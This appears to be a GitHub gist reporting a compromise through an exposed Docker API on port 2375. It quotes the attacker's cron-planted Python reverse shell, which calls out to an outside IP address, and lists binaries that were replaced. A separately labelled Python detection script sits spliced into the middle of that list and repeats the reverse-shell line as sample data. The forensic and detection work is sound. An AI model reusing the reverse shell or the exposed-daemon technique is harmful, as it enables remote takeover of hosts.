@bstevant
bstevant / gist:cafcfa3fc6fdf39f5e8da581d16466a1
Last active August 28, 2018 11:34
Possible infection through Docker?
A server with a public IPv4 address was running a Docker daemon with its control port (2375) unfiltered.
From the logs, the attacker started a container based on Ubuntu.
The logs for this container show only this command:
echo -e \"* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"211.149.215.17\\\",1496));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\\n\" >> /mnt/etc/crontab
The host's /etc/crontab indeed contains this line, which implies that the host filesystem was bind-mounted at /mnt inside the container.
Binaries replaced:
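The sequence above (API exposed on 2375, container started with the host filesystem mounted, reverse shell appended to the host crontab) can be checked for after the fact. The following is an added example and not code from the gist: it flags a daemon.json that exposes the API over plain TCP, a container whose HostConfig binds sensitive host paths, and crontab entries carrying the socket/dup2/shell markers of the planted line. The crontab text, the inspect dict and the daemon.json dict are constructed samples; the key names HostConfig.Binds, Privileged, hosts and tlsverify are the real Docker ones.

```python
"""Post-incident checks for the Docker-2375 -> host crontab reverse shell pattern.
Added example, not part of the original gist. All sample inputs are constructed."""
import re
from typing import Dict, List

# Markers of the cron-planted reverse shell: a TCP socket, an outbound
# connect, fd 0/1/2 duplicated onto the socket, and an interactive shell.
MARKERS = {
    "socket": re.compile(r"socket\.socket\("),
    "connect": re.compile(r"\.connect\(\("),
    "dup2": re.compile(r"os\.dup2\("),
    "shell": re.compile(r"/bin/(?:ba)?sh\b"),
}
CALLBACK_RE = re.compile(r'connect\(\(\s*"(\d{1,3}(?:\.\d{1,3}){3})"\s*,\s*(\d{1,5})\s*\)\)')

# Host paths that, bind-mounted into a container, give its process the host.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/var/run/docker.sock", "/proc", "/sys"}


def normalize(line: str) -> str:
    """Collapse the backslash escaping that docker logs / inspect JSON add
    (\\\" or \\\\\\\" -> \"), so the same regexes work on host and container copies."""
    return re.sub(r'\\+(["\'])', r"\1", line)


def scan_crontab(text: str) -> List[Dict]:
    """Return system-crontab entries (5 fields + user + command) that look like
    reverse shells, with the callback address when it can be parsed."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = normalize(raw).strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # comments and VAR=value lines
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        schedule, user, cmd = " ".join(parts[:5]), parts[5], parts[6]
        hits = [name for name, rx in MARKERS.items() if rx.search(cmd)]
        if len(hits) < 3:  # require socket + redirection + shell, not one stray word
            continue
        m = CALLBACK_RE.search(cmd)
        findings.append({
            "line": lineno,
            "user": user,
            "every_minute": schedule == "* * * * *",
            "callback": (m.group(1), int(m.group(2))) if m else None,
            "markers": hits,
        })
    return findings


def risky_container(inspect: Dict) -> List[str]:
    """Reasons a `docker inspect` document gives the container a foothold on the host."""
    hc = inspect.get("HostConfig", {})
    reasons = []
    if hc.get("Privileged"):
        reasons.append("privileged container")
    for bind in hc.get("Binds") or []:
        fields = bind.split(":")
        src = fields[0]
        dst = fields[1] if len(fields) > 1 else "?"
        src_norm = src if src == "/" else src.rstrip("/")
        if src_norm in SENSITIVE_HOST_PATHS:
            reasons.append(f"host path {src} mounted at {dst}")
    return reasons


def daemon_api_exposed(daemon_json: Dict) -> bool:
    """True if /etc/docker/daemon.json listens on TCP without TLS client verification."""
    hosts = daemon_json.get("hosts") or []
    return any(h.startswith("tcp://") for h in hosts) and not daemon_json.get("tlsverify")


# Constructed samples: a normal entry plus the planted line from the gist, unescaped
# as it would appear in the host's /etc/crontab.
SAMPLE_CRONTAB = (
    "SHELL=/bin/sh\n"
    "17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly\n"
    "* * * * * root /usr/bin/python -c 'import socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    's.connect(("211.149.215.17",1496));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); '
    'os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'\n'
)
SAMPLE_INSPECT = {"Config": {"Image": "ubuntu"},
                  "HostConfig": {"Privileged": False, "Binds": ["/:/mnt"]}}
SAMPLE_DAEMON = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}

if __name__ == "__main__":
    print("API exposed:", daemon_api_exposed(SAMPLE_DAEMON))
    print("Container:", risky_container(SAMPLE_INSPECT))
    for f in scan_crontab(SAMPLE_CRONTAB):
        print("Crontab:", f)
```

On a live host, feed it `cat /etc/crontab`, `docker inspect <id>` parsed with json.loads, and /etc/docker/daemon.json. Because the page also notes that /bin/ps and /bin/netstat were replaced, do not trust those binaries for the confirmation step: read the callback from the crontab entry and verify the connection from another host or from /proc/net/tcp directly.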
* /bin/ps
* /bin/netstat
* /bin/ssh
New files: